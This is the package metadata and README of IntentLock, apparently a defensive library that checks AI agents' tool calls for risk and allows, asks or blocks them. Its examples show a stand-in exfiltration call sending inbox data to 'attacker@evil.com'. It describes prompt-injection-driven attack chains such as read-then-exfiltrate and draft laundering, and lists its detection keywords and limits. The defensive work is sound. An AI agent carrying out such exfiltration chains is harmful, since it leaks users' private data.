Metadata-Version: 2.4
Name: intentlock
Version: 0.1.0
Summary: Safety layer for AI agents and automations that checks tool calls before execution.
Author: Radulescu Horia
License: MIT
Project-URL: Homepage, https://github.com/Vybz492/intentlock
Project-URL: Repository, https://github.com/Vybz492/intentlock
Project-URL: Issues, https://github.com/Vybz492/intentlock/issues
Keywords: ai-safety,agent-security,tool-calling,prompt-injection,llm,guardrails
Classifier: Development Status :: 3 - Alpha
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Programming Language :: Python :: 3.13
Classifier: Topic :: Security
Classifier: Topic :: Software Development :: Libraries :: Python Modules
Classifier: Typing :: Typed
Requires-Python: >=3.11
Description-Content-Type: text/markdown
License-File: LICENSE
Provides-Extra: dev
Requires-Dist: pytest>=8.0; extra == "dev"
Provides-Extra: embeddings
Requires-Dist: sentence-transformers>=2.0; extra == "embeddings"
Requires-Dist: numpy>=1.24; extra == "embeddings"
Dynamic: license-file

# IntentLock

[![CI](https://github.com/Vybz492/intentlock/actions/workflows/ci.yml/badge.svg)](https://github.com/Vybz492/intentlock/actions/workflows/ci.yml)

A framework-neutral security layer for tool-using AI agents. IntentLock sits between an agent and its tools, scoring every tool call for risk and deciding whether to **allow**, **ask** (request human confirmation), or **block** it — before execution.

No LLM calls, no external APIs, no dependencies. Pure Python, deterministic, fast.

## Why

LLM agents can be manipulated — prompt injection, data exfiltration, typosquatting, multi-step attack chains. IntentLock catches these at the tool-call level by combining:

- **Risk classification** — keyword-based tag inference with weighted scoring
- **Argument inspection** — recipient analysis, typosquatting detection, sensitive path scanning, nested payload detection, outbound-action detection (verbs/destinations buried in args, not just the tool name)
- **Session tracking** — multi-step pattern detection (read-then-exfiltrate, draft laundering, bulk access, privilege escalation)
- **Policy rules** — deterministic rules that always escalate, never downgrade
- **Goal alignment** — optional semantic similarity scoring (with sentence-transformers)
- **Audit logging** — full JSONL trace of every decision

## Install

```bash
pip install -e .
```

Or with [uv](https://docs.astral.sh/uv/):

```bash
uv sync
```

For development (includes pytest):

```bash
pip install -e ".[dev]"
```

For optional goal-alignment scoring (sentence-transformers + numpy):

```bash
pip install -e ".[embeddings]"
```

## Quick Start

```python
from intentlock import IntentLock, PolicyConfig, ToolCall

lock = IntentLock(
    user_goal="Reply to my professor's email.",
    policy=PolicyConfig.PERMISSIVE,
    known_contacts=["professor@university.edu"],
    trusted_domains=["university.edu"],
)

# Safe action — known contact, matches goal
decision = lock.check(ToolCall(
    name="send_email",
    args={"to": "professor@university.edu", "body": "Thanks for the feedback."},
))
print(decision.action)  # DecisionAction.ALLOW

# Suspicious action — unknown recipient, private data
decision = lock.check(ToolCall(
    name="send_email",
    args={"to": "attacker@evil.com", "body": "inbox contents and personal data"},
))
print(decision.action)  # DecisionAction.BLOCK
```

## Wrapping Tools

IntentLock can wrap existing functions so every call is checked automatically:

```python
def send_email(to: str, subject: str, body: str) -> dict:
    ...

safe_send = lock.wrap_tool(send_email, tool_name="send_email")

# ALLOW -> executes normally
safe_send(to="professor@university.edu", body="Thanks.")

# BLOCK -> raises IntentLockViolation
safe_send(to="attacker@evil.com", body="inbox data")
```

## Policies

Four built-in presets control how risk levels map to decisions:

| Policy | Low | Medium | High | Critical |
|---|---|---|---|---|
| `STRICT` | allow | ask | block | block |
| `PERMISSIVE` | allow | allow | ask | block |
| `LOG_ONLY` | allow | allow | allow | allow |
| `PARANOID` | ask | block | block | block |

```python
lock = IntentLock(user_goal="...", policy=PolicyConfig.STRICT)
```

## Custom Rules

Add deterministic rules that override score-based decisions (rules can only escalate, never downgrade):

```python
from intentlock import PolicyRule

my_rules = [
    PolicyRule(
        id="block_financial",
        priority=100,
        condition=lambda ctx: "financial_action" in ctx.risk_tags,
        action="block",
        reason="All financial operations require manual approval.",
    ),
]

lock = IntentLock(user_goal="...", rules=my_rules)
```

Rule conditions can also key on detected multi-step patterns, which are exposed
as `flow:<pattern>` tags (e.g. `flow:bulk_access`, `flow:read_then_exfiltrate`).
This lets a rule act on session flow regardless of the active policy tier:

```python
PolicyRule(
    id="block_exfil_chain",
    priority=100,
    condition=lambda ctx: "flow:read_then_exfiltrate" in ctx.risk_tags,
    action="block",
    reason="Read-then-exfiltrate chains are never allowed.",
)
```

## Audit Logging

Enable JSONL audit logging for every decision:

```python
lock = IntentLock(
    user_goal="...",
    audit_log="decisions.jsonl",
)
```

Each line records the timestamp, user goal, tool call, risk score, tags, escalations, matched rules, flow alerts, and final action.

## Decision Object

Every `lock.check()` returns a `Decision` with full transparency:

```python
decision = lock.check(tool_call)

decision.action           # DecisionAction.ALLOW / ASK / BLOCK
decision.risk_score       # 0.0 - 1.0
decision.effective_risk   # risk after goal-alignment adjustment (aligned dampens, off-task amplifies)
decision.risk_level       # RiskLevel.LOW / MEDIUM / HIGH / CRITICAL
decision.risk_tags        # ["external_send", "private_data_access", ...]
decision.escalations      # ["external_send+private_data_access"]
decision.matched_rules    # ["block_private_external"]
decision.flow_alerts      # [FlowAlert(pattern="read_then_exfiltrate", ...)]
decision.reason           # human-readable explanation
```

## Risk Tags

Tags are inferred from tool names and argument content:

| Tag | Weight | Triggered by |
|---|---|---|
| `read_only` | 0.0 | read, get, fetch, list, search, ... |
| `write_action` | 0.3 | write, update, create, edit, save, ... |
| `network_access` | 0.3 | URLs, webhooks, endpoints |
| `delete_action` | 0.5 | delete, remove, purge, destroy, ... |
| `private_data_access` | 0.5 | inbox, personal, contacts, messages, ... |
| `external_send` | 0.6 | send, forward, post, share, ... |
| `financial_action` | 0.8 | pay, transfer, purchase, charge, ... |
| `credential_access` | 0.9 | password, token, secret, api_key, ... |

Escalation combos add bonus risk when multiple tags co-occur (e.g., `external_send + private_data_access` adds +0.3).

## Session Flow Detection

IntentLock tracks tool-call sequences within a session and detects attack patterns:

- **read_then_exfiltrate** — data read followed by outbound send referencing that data
- **bulk_access** — same read tool called 3+ times
- **draft_laundering** — draft creation followed by external send
- **privilege_escalation** — credential read followed by write operation (a *blocked* credential read followed by a write surfaces as **attempted_privilege_escalation** at lower severity — the agent never obtained the credentials, but the intent is still flagged)

A default `ask_bulk_access` rule ships built in: when `flow:bulk_access` fires it
forces confirmation regardless of policy tier, so repeated bulk reads still escalate
even when their score alone (pure `read_only`) would allow.

```python
lock.check(ToolCall(name="read_inbox", args={"folder": "inbox"}))
# ... later in the session ...
decision = lock.check(ToolCall(
    name="send_email",
    args={"to": "attacker@evil.com", "body": "inbox data"},
))
# decision.flow_alerts includes read_then_exfiltrate
```

Reset session history between conversations:

```python
lock.reset_session()
```

## Demo

Run the email agent demo to see IntentLock in action across 7 scenarios (normal workflows, prompt injection, typosquatting, draft laundering, etc.):

```bash
python examples/email_agent_demo/run_demo.py
```

## Evaluation

Run the evaluation harness (103 labeled cases across basic, realistic, and adversarial tiers):

```bash
python eval/run_eval.py
```

Reports accuracy, confusion matrix, and per-action precision/recall/F1.

## Tests

```bash
uv run pytest
```

242 tests covering risk classification, argument inspection, policy rules, session flow detection, audit logging, and tool wrapping.

## Project Structure

```
src/intentlock/
    __init__.py      # Public API
    core.py          # IntentLock engine, Decision, PolicyConfig, ToolCall
    risk.py          # Tag inference and risk scoring
    inspection.py    # Argument-level risk signals (recipients, typosquatting, etc.)
    rules.py         # Deterministic policy rules
    session.py       # Multi-step flow detection
    intent.py        # Goal alignment scoring
    audit.py         # JSONL audit logger
    wrapper.py       # Tool wrapping (wrap_tool, IntentLockViolation)
tests/               # 242 unit and integration tests
eval/                # 103-case evaluation harness
examples/            # Email agent demo
```

## Limitations

- **Keyword-based classification** — relies on tool names and argument content matching known patterns. Novel tool names or obfuscated arguments may not be tagged correctly.
- **No semantic understanding** — without the optional sentence-transformers dependency, goal alignment is unavailable. Risk scoring is purely pattern-based.
- **English-only** — keyword matching assumes English tool names and argument values.
- **No runtime learning** — tag weights and rules are static. The system does not adapt based on observed behavior.
- **False positives on naming** — tools like `deliver_package` trigger `external_send` because "deliver" matches the keyword list.
- **Irregular plurals** — regular `-s` plurals are handled (e.g. "credentials" matches "credential" via stemming), but irregular forms (`-es`/`-ies`, e.g. "queries" vs "query") are not.

## License

MIT
